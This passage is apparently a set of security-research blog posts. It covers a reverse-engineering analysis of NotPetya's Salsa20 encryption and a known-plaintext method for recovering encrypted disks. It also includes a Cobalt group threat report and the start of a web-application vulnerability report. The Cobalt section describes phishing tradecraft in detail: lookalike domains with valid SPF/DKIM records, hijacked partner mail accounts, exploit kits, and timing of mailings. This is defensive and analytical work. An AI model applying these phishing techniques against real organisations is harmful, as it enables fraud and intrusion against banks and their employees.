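    y2 ^= rotl32((y1 + y0) & 0xFFFFFFFF, 9)
    y3 ^= rotl32((y2 + y1) & 0xFFFFFFFF, 13)
    y0 ^= rotl32((y3 + y2) & 0xFFFFFFFF, 18)
    return y0, y1, y2, y3

def salsa20_block(key, nonce, block_num, constant=b"expand 32-byte k"):
    # Generate one 64-byte keystream block for a 32-byte key.
    assert len(key) == 32 and len(nonce) == 8 and len(constant) == 16
    c = struct.unpack("<4I", constant)
    k = struct.unpack("<8I", key)
    n = struct.unpack("<2I", nonce)
    b = struct.unpack("<2I", struct.pack("<Q", block_num))
    state = [c[0], k[0], k[1], k[2],
             k[3], c[1], n[0], n[1],
             b[0], b[1], c[2], k[4],
             k[5], k[6], k[7], c[3]]
    x = list(state)
    for _ in range(10):  # 10 double rounds = 20 rounds
        # column round
        x[0], x[4], x[8], x[12] = quarter(x[0], x[4], x[8], x[12])
        x[5], x[9], x[13], x[1] = quarter(x[5], x[9], x[13], x[1])
        x[10], x[14], x[2], x[6] = quarter(x[10], x[14], x[2], x[6])
        x[15], x[3], x[7], x[11] = quarter(x[15], x[3], x[7], x[11])
        # row round
        x[0], x[1], x[2], x[3] = quarter(x[0], x[1], x[2], x[3])
        x[5], x[6], x[7], x[4] = quarter(x[5], x[6], x[7], x[4])
        x[10], x[11], x[8], x[9] = quarter(x[10], x[11], x[8], x[9])
        x[15], x[12], x[13], x[14] = quarter(x[15], x[12], x[13], x[14])
    return struct.pack("<16I", *((xi + si) & 0xFFFFFFFF for xi, si in zip(x, state)))
```

Changing the constant changes every keystream block, which is one reason a standard Salsa20 implementation cannot directly reproduce NotPetya's output.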
When everything is encrypted, the machine restarts again, and the ransomware appears on screen requesting the decryption key.
The key is supposed to be a 32-character string containing a combination of the following characters: 0123456789abcdef. This string is run through a function that accepts an arbitrary number of bytes as input, and outputs 32 bytes. Presumably this is the SPONGENT hash function (to be confirmed). Then the output is fed through the same function 128 times, which gives us EncryptionKey. To check whether the key is valid, an attempt is made to decrypt the contents of sector 0x21, and if the expected unencrypted text is found there (all 0x07), MFT decryption and MBR restoration are started.
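The key check just described can be sketched as follows. The 32-byte hash is presumed (not confirmed) to be SPONGENT, so sha256 serves here purely as a placeholder, and decrypt is a hypothetical stand-in for the Salsa20-style routine:

```python
import hashlib

HEX_ALPHABET = "0123456789abcdef"

def derive_candidate_key(user_key):
    # The entered key: 32 characters from the hex alphabet.
    assert len(user_key) == 32 and all(c in HEX_ALPHABET for c in user_key)
    # One initial hash pass plus 128 further iterations (129 in total).
    # The real 32-byte function is presumed to be SPONGENT (unconfirmed);
    # sha256 is used here purely as a placeholder.
    data = user_key.encode()
    for _ in range(1 + 128):
        data = hashlib.sha256(data).digest()
    return data

def key_is_valid(user_key, enc_sector_21, decrypt):
    # decrypt(key, data) is a hypothetical Salsa20-style routine; the key
    # is accepted if sector 0x21 decrypts to 512 bytes of 0x07.
    return decrypt(derive_candidate_key(user_key), enc_sector_21) == b"\x07" * 512
```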
Can the attacker decrypt user files?
In my view, the authors of NotPetya did not intend for files to be recoverable after receipt of payment. Here's why:
1. The Personal Installation Key, which needs to be given to the virus creators after paying the ransom, is not related in any way to EncryptionKey. Both keys are random data. One key does not tell us anything about the other key, unless the attackers have some special knowledge about the workings of CryptGenRandom. Alternatively, the authors are supposed to send both EncryptionKey + Personal Installation Key to their own server, but nobody has reported such activity (and I have not seen such indications in the code, although it cannot be ruled out).
2. If my guess about the SPONGENT hash function proves correct, the decryption key is supposed to be the output of the hash. In order to calculate a valid key, this hash would need to be reversed (129 times), which is impossible with today's technology.
3. The entropy of EncryptionKey is 32*8 == 256 bits. The entropy of the hex key (entered by the user) is 32*4 == 128 bits. A deterministic transformation cannot increase entropy, so 32 hexadecimal characters cannot determine an arbitrary 32-byte value.
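The entropy arithmetic in point 3 can be checked directly:

```python
import math

# EncryptionKey: 32 random bytes
key_entropy_bits = 32 * 8                  # 256 bits

# User-entered key: 32 characters, each from a 16-symbol hex alphabet
input_entropy_bits = 32 * math.log2(16)    # 128 bits

# 2**128 possible inputs cannot cover a 2**256 keyspace, so the hex key
# cannot determine an arbitrary EncryptionKey value.
assert key_entropy_bits == 256 and input_entropy_bits == 128.0
```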
Differences from Petya (sample dated January 9, 2016)
Petya did not want to infect my test machine. Maybe it requires a network connection or something else—in any case, I had to do a memory dump.
I have not managed to review the code that generates the sectors used in the MBR set by Petya, but I did look at screenshots and the code run after restart.
Differences:
1. Sectors 0x36–0x39 are used (compare to NotPetya: 0x20–0x23).
2. Most auxiliary functions (text display, sector read/write) are identical to Petya.
3. Petya contains a function and strings for displaying a skull-and-bones banner. NotPetya has a very similar function but it is probably never called, and the strings have been zeroed out.
4. The length of the Personal Installation Key is 90 characters (15 groups of 6 characters each) versus 60 in NotPetya. Using an alphabet of 58 characters, a maximum of 527 bits of information can be conveyed this way (versus 351 in NotPetya).
5. The Petya dump shows strings secp256k1 and secp192k1, which might mean that the Personal Installation Key is derived from EncryptionKey, which is calculated using elliptic-curve cryptography.
6. The user-entered key to start decryption should be a 16-character string from the following alphabet: 123456789abcdefghijkmnopqrstuvwxABCDEFGHJKLMNPQRSTUVWX.
7. Nothing resembling SPONGENT (or any other hash) is found.
8. Salsa20 uses the original constant "expand 32-byte k." The code of the functions is nearly identical, and while the Petya code was likely generated by a compiler (optimization was applied to repeating characters), it seems that in NotPetya, the constants were simply replaced.
Petya:
NotPetya:
The evidence, in my view, suggests that another strain of Petya existed, and after replacing constants and strings, that it was used to create NotPetya.
Again, I do not believe that NotPetya was intended to support decryption of victims' files, while Petya did in fact have such functionality. Disk recovery may still be an option, however. Both viruses have similar errors in the implementation of encryption algorithms, which could make it possible to quickly brute-force an encryption key to recover all encrypted data. Back in 2016, researchers described a method for recovering Petya-encrypted data without paying a ransom.
↧
Recovering data from a disk encrypted by #NotPetya with Salsa20
Ransomware attacks are an alarming trend of 2017. There have been many such attacks, but the ones that made the headlines are WannaCry and NotPetya (also known as Petya, Petya.A, ExPetr, and other names). With the lessons of the previous epidemic heeded, specialists across the globe promptly reacted to the new challenge and, in a matter of hours after the first computers became infected, began analyzing encrypted disks. As early as June 27, the first descriptions [1] of how NotPetya spreads and infects computers appeared. Even better, a vaccine [2] to prevent NotPetya infections was found.
If NotPetya is unable to obtain administrator privileges when running, it performs AES encryption of user files only and the operating system continues to work. Unfortunately, recovering user files in that case requires knowing the private RSA key (which is allegedly available for purchase on the Darknet for 100 bitcoins).
The below method for recovering data works only if NotPetya had administrator privileges and used the Salsa20 algorithm to encrypt the entire hard drive.
It turned out that the creators of NotPetya made an error in their implementation of the Salsa20 algorithm. Due to this error, half of the encryption key bytes were not used in any way. This reduction in key length from 256 to 128 bits, unfortunately, still does not leave any hope of decrypting data in a reasonable time.
However, certain peculiarities of how the Salsa20 algorithm was applied allow recovering data, no key necessary.
How Salsa20 works
Salsa20 is a synchronous stream cipher in which encryption generates a key-dependent keystream, and the bytes of this keystream are added to the bytes of plaintext using the XOR operation. For decryption, the procedure must be repeated.
For the keystream to be computed for any offset in the stream, the keystream generator s20_expand32() generates a 64-byte keystream array into which the following is mixed:
· 256 bits (32 bytes) of the encryption key
· 8 bytes of the nonce (number used once) random sequence
· 16 bytes of the sigma constant ("expand 32-byte k" or "-1nvalid s3ct-id")
· 64 bits (8 bytes) of the block number in the stream
It should be noted that generated keystream fragments are always aligned to 64-byte boundaries. For example, to encrypt 7 bytes starting at offset 100, we must find the block containing the first byte (100/64 == 1), compute the keystream for this block, and use 7 bytes from it starting from the offset within the block (100%64 == 36). If there are not enough bytes in the block, a keystream is generated for the next block, and so on.
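The alignment logic in that example can be expressed as a small helper; block_fn stands for any function returning the 64-byte keystream block for a given block number (the names here are illustrative, not from the NotPetya code):

```python
def keystream_bytes(offset, length, block_fn):
    # block_fn(n) must return the 64-byte keystream block number n.
    out = b""
    while length > 0:
        block_num, skip = divmod(offset, 64)   # which block, offset within it
        block = block_fn(block_num)
        take = min(64 - skip, length)          # bytes available in this block
        out += block[skip:skip + take]
        offset += take
        length -= take
    return out
```

For offset 100 and length 7, this fetches block 1 and takes bytes starting at offset 36 within it, matching the example above.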
While encrypting a single stream (a disk is regarded by NotPetya as one stream), neither the key nor nonce changes. Therefore, for each encrypted disk, the only variable that affects the keystream is the block number.
As designed by the creators of Salsa20, 2^64 blocks of 64 bytes each allow generating a keystream with a period of 2^70 ≈ 10^21 bytes. This is a fairly long period for almost any practical application, and hard disks of this capacity will certainly not appear any time soon.
However, implementing all this was a bit more difficult.
Actual keystream period in NotPetya
Look at the prototype of the function s20_crypt32(); disk sectors are encrypted by calling this function.
enum s20_status_t s20_crypt32(uint8_t *key,
uint8_t nonce[static 8],
uint32_t si,
uint8_t *buf,
uint32_t buflen)
A byte offset in the stream is passed through the si (probably Stream Index) argument. Judging by the type of the argument, it is clear that it contains only 32 bits, rather than 64. This value is divided by 64 before going into the keystream, so a maximum of 26 bits remains.
// Set the second-to-highest 4 bytes of n to the block number
s20_rev_littleendian(n+8, si / 64);
Highlighted in gray are the bytes that do not affect keystream generation due to an error in the implementation of the function s20_rev_littleendian(). So out of 26 bits of the block number, only 16 bits (bytes at offset 0x20-0x21) affect the keystream. Therefore, the maximum keystream period is 2^16 = 65,536 blocks of 64 bytes each, or 4 megabytes.
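A sketch of the resulting arithmetic (function and constant names are illustrative, not from the malware):

```python
def effective_block(si):
    # si is the 32-bit stream offset passed to s20_crypt32(); dividing by
    # 64 leaves 26 bits, but the s20_rev_littleendian() bug keeps only the
    # low 16 bits of the block number.
    return (si // 64) & 0xFFFF

PERIOD_BYTES = (1 << 16) * 64  # 65,536 blocks of 64 bytes = 4 MiB

# Any two offsets exactly 4 MiB apart are encrypted with the same
# keystream block:
assert effective_block(0) == effective_block(PERIOD_BYTES)
```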
The volume of encrypted data on a hard drive is many times larger than 4 megabytes, so many different pieces of data are encrypted using the same keystream fragments. This fact allows implementing a trivial attack based on known plaintext.
Another error
The developers' errors do not end here. When the function s20_crypt32() is called, they pass... the number of the 512-byte sector instead of the offset value in bytes!
Sectors are usually encrypted in pairs (1,024 bytes per access), which means that the keystream used to encrypt two neighboring sector pairs is the same in 1,022 bytes (offset by 2 bytes).
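A sketch of the overlap arithmetic (names are illustrative):

```python
SECTOR = 512

def keystream_span(first_sector):
    # Because s20_crypt32() receives the sector number where a byte offset
    # was expected, the pair (N, N+1) is keyed with keystream bytes
    # [N, N + 1024) rather than [N * 512, N * 512 + 1024).
    return first_sector, first_sector + 2 * SECTOR

a_start, a_end = keystream_span(100)  # sectors 100-101
b_start, b_end = keystream_span(102)  # the next pair, sectors 102-103
overlap = a_end - b_start             # 1,022 shared keystream bytes, shifted by 2
```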
Heuristics for Known Plaintext Attack
Modern versions of Windows use the NTFS file system, which employs a number of different structures; most of their fields are fairly predictable.
What's more, disks contain a great many files whose contents are also quite predictable (in whole or in part).
First 512 bytes of the keystream
To validate the encryption key, NotPetya encrypts sector 0x21, which contains predefined values (all bytes 0x07). This gives us 512 bytes of the keystream.
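Recovering those keystream bytes is a one-line XOR (enc_sector_21 below is a placeholder name for the encrypted contents of sector 0x21):

```python
def recover_keystream(ciphertext, known_plaintext):
    # For a stream cipher, ciphertext = plaintext XOR keystream,
    # so keystream = ciphertext XOR known plaintext.
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))

# Sector 0x21 contained 512 bytes of 0x07 before encryption, so:
# keystream = recover_keystream(enc_sector_21, b"\x07" * 512)
```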
Recovering the keystream by MFT
NotPetya does not encrypt the first 16 MFT records (32 sectors) but encrypts all the others.
Each file record begins with the sequence "FILE" usually followed by bytes 30 00 03 00 (UpdateSequenceArrayOffset = 0x30, UpdateSequenceArrayLength = 3). Theoretically, these 4 bytes can have other values, but they are almost always the same for all file records within the same logical NTFS partition.
So from one file record (occupying two sectors), 8 bytes of the keystream can be retrieved, and each neighboring record provides two more bytes (and the possibility to verify the six previously obtained bytes). The final records are almost entirely composed of zeros, which can provide up to 1,024 additional bytes of the keystream.
After the keystream fragments used to encrypt the MFT are retrieved, the entire structure of the file system can be recovered.
Recovering the keystream by known files
NotPetya also encrypts the first two sectors of each file longer than 1,024 bytes. The cluster size usually exceeds 2 sectors (it can be 8 sectors, for example). In that case, after finding the encrypted header of any file and skipping 1,024 bytes, we can easily retrieve the next 3 kilobytes in plaintext. If we have a file in which exactly the same 3 kilobytes are at the offset of 1,024 bytes from the header, the file header will very likely also be the same. So we can retrieve up to 1,024 additional bytes of the keystream.
A clean install of Windows XP contains 8,315 files in the Windows folder. In Windows 8.1 installed on an actively used computer, this number exceeds 200,000. Chances are that many of them match the files on an encrypted disk.
Thanks to this, indexing DLL and EXE files from available Windows installations (preferably of the same version and with similar updates installed) may be enough to recover the keystream completely.
Having retrieved keystream fragments, you can also proceed to attempt recovery of unique files.
Prospects and pitfalls
Manual recovery of an encrypted disk is a tedious task—the process can take hours and requires a large amount of free disk space. Few users have a spare empty disk as large as the one that is encrypted, and attempting experiments on an infected original disk is a fool's errand.
So those wishing for an easy, hassle-free recovery tool are still out of luck. On the bright side, we can expect that professional service providers will be able to recover more data than has been the case to date.
Companies that specialize in data recovery are likely to come up with the necessary software, thanks to their experience and expertise.
That said, there are still a few snags in the way of recovery. The algorithm for selecting sectors to be encrypted (and which therefore need to be decrypted) contains errors as well (for example, when parsing NTFS structures), and this can have an effect on the result.
Recovering data from a hard drive using the described method requires applying certain heuristics. The completeness of data recovery depends on many factors (disk size, free space, and fragmentation) and may be able to reach 100% for large disks that contain many standard files (OS and application components that are identical on many machines and have known values).
As stated at the beginning of this article, this method unfortunately cannot be used to decrypt files that were encrypted with the AES algorithm, which is used by NotPetya when it is unable to obtain administrator privileges.
Thank you to Alexander Peslyak (Solar Designer) for his hints and suggestions, which helped to design the method described.
Author: Dmitry Sklyarov, Head of Reverse Engineering, Positive Technologies
↧
↧
Cobalt strikes back: an evolving multinational threat to finance
1. Introduction
Bank robbery is perhaps the quintessential crime. The promise of immense, instant riches has lured many a criminal to target banks. And while the methods, tools, and scale of robbery have all changed, two things have stayed the same: the enticement of a hefty payday and the fact that no system is perfectly secure. In the modern digital economy, criminals are becoming ever more creative in finding ways to make off with millions without having to leave home. Despite enormous efforts, security is always a work in progress because of technical vulnerabilities and the human factor. Only a small fraction of banks today are able to withstand targeted attacks of the kind perpetrated by Cobalt, a cybercriminal group first described in 2016 that is currently active worldwide. Now the group has set its sights on more than just banks.
Researchers at Positive Technologies and other companies have described the group's methods previously. In this report, we will describe the new techniques used by Cobalt in 2017, the changing target profile, and recommendations on how to avoid becoming their latest victim.
2. Executive summary
The Cobalt group has been quick to react to banks' protective measures. When spam filters on mail servers began to block most of the group's phishing emails, which contained forged sender information, the attackers changed techniques. Now they actively use supply chain attacks to leverage the infrastructure and accounts of actual employees at one company, in order to forge convincing emails targeting a different partner organization. This tactic has already been used by other attackers, such as when the infrastructure of M.E.Doc was used to spread the NotPetya virus, which blocked workstations at a large number of major companies.
Cobalt has attacked banks, financial exchanges, insurance companies, investment funds, and other financial organizations. The group is not afraid to use the names of regulatory authorities or security topics to trick recipients into opening phishing messages from illegitimate domains.
Here is some of the latest information about techniques used by the Cobalt group:
- Active attacks on bank partners in order to use partner infrastructure for sending phishing messages to banks.
- Phishing messages disguised as mailings from financial regulators.
- Various types of malicious attachments: document with an exploit (.doc, .xls, .rtf), archive with an executable dropper file (.scr, .exe), and archive with LNK file (.lnk).
- Among the first groups to get access to the latest version of the Microsoft Word Intruder 8 exploit builder, which made it possible to create documents exploiting vulnerability CVE-2017-0199.
- Poorly protected public sites are used to upload files and then download them to victim computers.
- Phishing messages are sent both to corporate addresses and personal addresses of employees.
3. What we already knew about Cobalt
4. Cobalt targets and objectives
The Cobalt group's traditional "stomping grounds" are Eastern Europe, Central Asia, and Southeast Asia. In 2017, attacks grew to include North America, Western Europe, and even South America (Argentina).
Of the companies targeted by Cobalt in phishing mailings, around 75 percent are in the financial sector. Most of these financial companies are banks (90%), but others include financial exchanges, investment funds, and lenders. This widening range of targets suggests that attacks on diverse companies with major financial flows are underway. This concurs with the forecast made by the FinCERT of the Russian Central Bank, which predicted increased interest by cybercriminals in financial exchanges in 2017.
By attacking a financial exchange, the Cobalt group can "pump" or "dump" stocks, incentivizing purchase or sale of shares in certain companies in a way that causes rapid fluctuations in share price. Stock manipulation can affect not just the welfare of a single company, but the economy of entire countries. These methods were employed by the Corkow group in their 2016 attack on Russia's Energobank, which caused a 15-percent swing in the exchange rate of the ruble and bank losses of RUB 244 million (over USD 4 million).
The remaining 25 percent of targeted companies represent diverse industries:
- Government
- Telecom/Internet
- Service Providers
- Manufacturing
- Entertainment
- Healthcare
Since the beginning of 2017, our researchers have studied over 60 unique samples of phishing messages sent as part of Cobalt campaigns. These messages were sent to over 3,000 people in 12 countries. The addresses include corporate addresses but also personal ones, since employees can often check their personal email on work computers.
Notably, Cobalt attacks government organizations and ministries in order to use them as a stepping stone for other targets.
5. Chronology of Cobalt 2017 campaign
In early 2017, we noted that the Cobalt group was actively registering illegitimate domains. As soon as these domains were used to send phishing mailings, we notified the security departments of the targeted companies, as well as the FinCERT of the Russian Central Bank. Thanks to this timely intervention, the domains were blocked before the attackers could make use of them.
Positive Technologies has investigated incidents related to attacks by the Cobalt group at a number of companies in 2017. In several cases, the attackers compromised company infrastructure and employee accounts in order to send phishing messages to partner companies (i.e., companies that have a legitimate pre-existing business relationship with banks) in North and South America, Europe, CIS countries, and Central and Southeast Asia. Against targets in the CIS countries, the attackers also used their own infrastructure, which included rented dedicated servers located in North America, Europe, and Southeast Asia.
Several pieces of information suggest that the team responsible for the technical aspects of attacks consists of only a handful of people. When the attackers were at their most active inside target networks, the group would temporarily stop registering domain names and sending phishing mailings. Activity not aimed at the targeted infrastructure was not detected. The days and times of mailings are also suggestive in this regard, as described later in this report.
6. Cobalt attack methods
The Cobalt group relies on social engineering to penetrate networks—users open malicious attachments from phishing messages that are disguised by the attackers to resemble messages from legitimate companies and regulatory authorities. These attachments contain a document file, which downloads a dropper from a remote server or contains the dropper in a password-protected archive. Small in size, a dropper is used to download and run other malicious software (in the case of Cobalt, the Beacon Trojan).
Preparations and progression of a typical attack are illustrated below.
For information on the actions of Cobalt attackers inside the network of a targeted organization, please see our previous report.
1. Partner phishing
The Cobalt group's traditional method—sending messages with forged sender information—has fallen out of favor. Instead, the group has paid more attention to making sure that messages get delivered by dodging mail server filters.
For a targeted mailing ("spear phishing"), the criminals use previously registered domains. A domain name is chosen to be similar in meaning and spelling to the domain of the real company. For messages to make it through antispam and antivirus checks, the criminals correctly configure SPF entries on the DNS server and indicate the correct DKIM signatures for their messages. This approach allows bypassing verification of the address of the sender's mail server, but offers digital evidence for investigators.
Despite the increased complexity involved, in the first quarter of 2017 the Cobalt group also began to attack various companies that partner with banks, then sending phishing messages from these partners' infrastructures using the hacked accounts and mail servers of real employees.
This approach ensures that recipients are likely to trust the sender and has a number of advantages:
- Attackers get information stored on the servers and in the databases of the compromised partner organization. This information can be used to create convincing phishing messages.
- Attackers obtain access to employee accounts on workstations and mail servers, giving phishing messages a high degree of trust and plausibility among potential recipients.
- Messages from partners are not blocked by mail server filters.
The attackers carefully choose subject lines, recipient addresses, and attachment names that will "fly below the radar" so that recipients open the attachments enclosed with phishing messages.
Today, Cobalt uses phishing mailings at practically all stages of targeted attacks on banks.
1. Initial compromise starts with one or more workstations at a partner organization, which have been infected via phishing.
A message informing of "missed payments"
Instructions for connecting to a payment gateway—supposedly
2. The attack against the partner organization is then developed by means of internal mailings containing malicious documents supposedly from colleagues, management, or IT.
"Documents requested by the head of the department"
A message claiming to inform of payroll changes
3. Malicious messages are sent from the partner's infrastructure to banks and other financial organizations.
A password-protected archive (with the password "doc") supposedly containing an invoice for ATM maintenance
In early 2017, 60 percent of phishing messages from Cobalt related to cooperation and service terms between banks and their partners.
In 2017 Cobalt began to use security anxieties as an attack vector. The group has sent messages from illegitimate domains posing as VISA, MasterCard, and FinCERT units of the Russian Central Bank and National Bank of the Republic of Kazakhstan.
Broken English and copied boilerplate text can be convincing in the right circumstances
A fake FinCERT message
In Russia, this was a particularly ironic twist, since FinCERT had been actively warning financial companies about the Cobalt threat. The group took advantage of this anxiety to send banks malicious documents supposedly explaining how to keep bank systems safe.
A vague warning that asks the user to act immediately
So by creating counterfeit domains superficially similar to those of real companies, the criminals use the imprimatur of well-known organizations to convince users to open dangerous attachments.
Since real messages from colleagues and partners usually arrive during working hours, the criminals timed their mailings so that employees would receive them during the recipients' working hours, regardless of the attackers' own time zone.
Most messages were received in the afternoon—the reason being that employees tend to be less vigilant, and therefore more susceptible to phishing, as the evening approaches.
We noticed a slight variation in tactics against North American companies. Messages targeting U.S. and Canadian organizations were sent from the compromised infrastructure of a European partner. To keep the European origin of the phishing messages plausible, the criminals performed the mailing during European working hours, so the targets received the emails early in the morning in the U.S. and Canada.
2. Malicious attachments
To ensure remote access to the workstation of an employee at a target organization, the Cobalt group (as in previous years) uses Beacon, a Trojan available as part of commercial penetration testing software Cobalt Strike.
The Trojan is delivered and run with the help of a special dropper. The dropper consists of .scr or .exe files that are placed on the victim's computer in one of the following ways:
- In a password-protected ZIP archive, the password to which is given in the text of the phishing message.
- Downloaded from a hacked website when a malicious attachment (.doc, .xls, .rtf) is opened from the phishing message.
- Downloaded from a hacked website based on commands coded in a LNK file that is in a ZIP archive attached to the message.
Poorly protected websites are compromised by the attackers and used, in essence, as file hosts for spreading malicious files in attacks against banks.
52 percent of the Cobalt phishing messages reviewed by our researchers contained Microsoft Word documents.
The malicious Microsoft Office documents that trigger download of the dropper are created using the Ancalog and Microsoft Word Intruder (MWI) exploit kits. With these kits, even a hacker without programming skills can create malicious Word documents and PDF files in an intuitive visual interface in just minutes.
The Cobalt group was one of the first to get their hands on a restricted version of MWI able to create documents exploiting the critical vulnerability CVE-2017-0199. Since this version was sold on an individual basis to customers well known to the developer, there may be a relationship between the Cobalt group and the developer of MWI. One telling fact: less than a week passed between the announcement of the new MWI version and Cobalt's first use of attachments exploiting CVE-2017-0199.
MWI is positioned by its developer as a tool for performing APT attacks; if the software is instead used to create files for mass spamming, the developer revokes the license. For users of the restricted version of MWI, the developer offers a sort of "scrubbing" so that files will not be flagged by currently available antivirus scanners.
The MWI developer boasting of the "product" online
Malicious documents sent by Cobalt to banks and their partners use exploits for vulnerabilities CVE-2017-0199, CVE-2015-1641, and CVE-2012-0158 in order to download and run the dropper on the victim system.
An official-seeming document about how to pay overdue debts
When the attachment is opened, malicious code is run. This code takes advantage of vulnerabilities in Microsoft Office to download the dropper from a remote server and run it. After the code finishes running, a decoy document (such as shown in the screenshot) is displayed.
The attackers upload files to vulnerable sites in advance, from where the files can be later downloaded to victim systems during an attack. Therefore we urge website owners to be vigilant in securing their sites: if weak protections cause a site to become a staging ground for malware, regulators may block the site or law enforcement may seize server equipment as part of a criminal investigation. Public knowledge of such incidents is likely to cause severe damage to company reputation.
Usually Cobalt phishing messages are sent in several waves. In the first wave, the criminals send Microsoft Office documents created using the described exploit kits.
If there are no "hits" from targeted users within 24 hours of a mailing (this is possible if a company has up-to-date versions of Microsoft Office that are free of the vulnerabilities targeted by the exploit builders), the attackers send a second wave.
Attached to the messages is a dropper, consisting of .exe or .scr executable files, in a password-protected archive. By placing the files in an archive, the attackers can bypass some filtering and antivirus systems. Solutions are available for real-time scanning of encrypted archives (when the password is indicated in the body of the message, as is the case here) but organizations making use of such software are few and far between.
In addition, we have observed a separate mailing in which the attached archives contained LNK files; as in all the other cases, these files are used to download the Beacon dropper.
3. Cobalt infrastructure
Since a Cobalt mailing is sent to thousands of recipients, the group clearly is using some sort of automation. Based on analysis of the phishing messages, we believe that the messages are sent from phishing domains with the help of alexusMailer v2.0, a freely available PHP script used to send emails anonymously.
alexusMailer and other scripts are available on forums
The script includes support for multithreaded sending, a visual editor for messages, import of recipient lists and other fields from files, templates, attaching any number of files to a message, and more. Users can distribute sending tasks over a number of servers and set a delay for message sending.
alexusMailer interface
However, when messages are sent with alexusMailer, the message header contains an artifact: the X-PHP-Originating-Script field holds the file name of the PHP script that sent the message. This header is added when the mail.add_x_header option is enabled in php.ini on the sending servers.
The Cobalt group uses widely available public mail services, as well as services that allow anonymous registration of temporary addresses. Some of the domains used for reply addresses in Cobalt mailings include: TempMail (@doanart.com, @rootfest.net), Mail.com (@mail.com), AT&T Mail (@att.net, @sbcglobal.net), and Yahoo! (@ymail.com). These same services were used by Cobalt to create email addresses when registering domains.
Based on the times at which the domains in the Cobalt infrastructure were registered, we found that the attackers tended to register domains towards the beginning of the week. This enables us to speculate on their working schedule:
− On weekdays, the attackers actively register domains, prepare hacking tools, and (less often) send phishing mailings.
− At the end of the week, the group concentrates on sending out mailings and advancing their attacks within the infrastructure of compromised organizations.
− Since phishing mailings are sent out during working hours, domains are usually registered between 6:00 PM and 12:00 AM (UTC+0), after the end of the working day in European countries.
It would seem that after registering a domain at the beginning of the week, the Cobalt group takes some time to prepare for their upcoming phishing campaign, which as noted usually comes at the end of the week. On average, the time from domain registration to the first phishing mailing with that same domain is four days.
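This kind of temporal fingerprinting is straightforward to reproduce: given domain registration timestamps from WHOIS data, tally them by weekday and by hour. A sketch with made-up timestamps (not real Cobalt data):

```python
from collections import Counter
from datetime import datetime

def registration_profile(moments: list[datetime]) -> tuple[Counter, Counter]:
    """Tally domain registrations by weekday and by hour (assumed UTC)
    to expose the operators' working pattern."""
    by_day, by_hour = Counter(), Counter()
    for dt in moments:
        by_day[dt.strftime("%A")] += 1
        by_hour[dt.hour] += 1
    return by_day, by_hour

# Made-up registration times clustered early in the week and in the evening
sample = [datetime(2017, 5, 1, 19, 12), datetime(2017, 5, 2, 20, 3),
          datetime(2017, 5, 8, 18, 45)]
days, hours = registration_profile(sample)
print(days.most_common(1))  # [('Monday', 2)]
```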
Our researchers discovered a number of Cobalt phishing domains before the group was able to use them in its phishing campaigns. By acting quickly, it was possible to block the domains.
Working in cooperation with industry regulators in Russia and other countries, we have succeeded in disabling delegation for all .ru domains and most other top-level domains known to be associated with Cobalt.
7. Conclusion
The barrier to entry for would-be cybercriminals keeps falling every year. No longer do hackers need to look for zero-day vulnerabilities and expensive tools to perform attacks. Instead, all they require are basic programming skills, commercially available software, and instructions posted on the Internet.
Banks and other companies must realize that attackers are constantly refining the tools and techniques they use. In today's environment, a company can fall victim just by getting caught in the middle as attackers scout for stepping stones to reach their ultimate target. That's why responsible companies can no longer remain complacent about security and pretend that hackers go after only large companies and banks, or target only far-away areas of the world.
No matter their industry or ownership—whether banks, state-owned organizations, or whatever else—companies must keep protection of their digital infrastructure current and proactively update their software and operating systems. Employees must be trained to increase their security awareness and resist phishing attempts. Moreover, scanning should go beyond just incoming messages and attachments to include outgoing messages, with retrospective analysis. Public-facing web applications must also be protected—if company infrastructure or sites are compromised by an attacker, this can wound company reputation, cause blocking of company servers, trigger a drop in search engine ratings, and drive away customers.
Information about the extent of losses caused by the Cobalt group in 2017 is not yet available. Perhaps warnings by bank regulators headed off some of the group's efforts. We will continue to monitor the Cobalt group and report new details as they become available. Judging by the scale of Cobalt campaigns worldwide, multimillion-dollar losses by banks are a real possibility. And if attacks on financial exchanges are successful, the consequences will include not only direct losses to individual companies, but rate turbulence on world currency markets.
↧
Web application vulnerability report: time to dig into the source code
Introduction
Every year, web applications expand their presence in more and more areas. Almost every business has its own web applications for clients and for internal business processes. However, application functionality is often prioritized at the expense of security, which negatively affects the security level of the entire business.
As a result, web application vulnerabilities provide massive opportunities for malicious actors. By taking advantage of mistakes in application architecture and administration, attackers can obtain sensitive information, interfere with web application functioning, perform DoS attacks, attack application users, penetrate a corporate LAN, and gain access to critical assets.
This report provides statistics gathered by Positive Technologies while performing web application security assessments throughout 2016. Data from 2014 and 2015 is provided for comparison purposes.
This information suggests paths of action: which security flaws in web applications require attention during development and operation, how to distinguish potential threats, and what the most effective techniques for security assessment are. We also illustrate trends over time in web application development in the context of information security.
1. Materials and methods
Data for this report is drawn from 73 web applications examined in 2016 for which Positive Technologies conducted in-depth analysis. Some of the applications are publicly available on the Internet, while others are used for internal business purposes. We excluded vulnerabilities detected in the course of penetration testing, perimeter scanning, and online banking security audits; this information can be found in the respective reports.
Vulnerability assessment was conducted via manual black-, gray-, and white-box testing (with the aid of automated tools) or automated source code analysis. Black-box testing means looking at an application from the perspective of an external attacker who has no prior or inside knowledge of the application. Gray-box testing is similar to black-box testing, except that the attacker is defined as a user who has some privileges in the web application. The most rigorous method, white-box testing, presupposes the use of all relevant information about the application, including its source code. Results of manual security assessment are given in Section 5 of this report, while the results of automated scanning are in Section 6.
Vulnerabilities were categorized according to the Web Application Security Consortium Threat Classification (WASC TC v. 2), with the exception of Improper Input Handling and Improper Output Handling, as these threats are implemented as part of a number of other attacks. In addition, we distinguished three categories of vulnerabilities: Insecure Session, Server-Side Request Forgery, and Clickjacking. These categories are absent from the WASC classification, but can be often found in the web applications studied.
The Insecure Session category includes session security flaws, such as missing Secure and HttpOnly flags, which allow attackers to intercept the user's cookies in various attacks.
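A quick way to screen for this flaw is to inspect Set-Cookie headers for the missing flags. A sketch using the standard library (the cookie name is illustrative):

```python
from http.cookies import SimpleCookie

def insecure_cookies(set_cookie_header: str) -> list[str]:
    """Return cookie names missing either the Secure or the HttpOnly flag."""
    jar = SimpleCookie()
    jar.load(set_cookie_header)
    return [name for name, morsel in jar.items()
            if not morsel["secure"] or not morsel["httponly"]]

print(insecure_cookies("SESSIONID=abc123"))                    # ['SESSIONID']
print(insecure_cookies("SESSIONID=abc123; Secure; HttpOnly"))  # []
```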
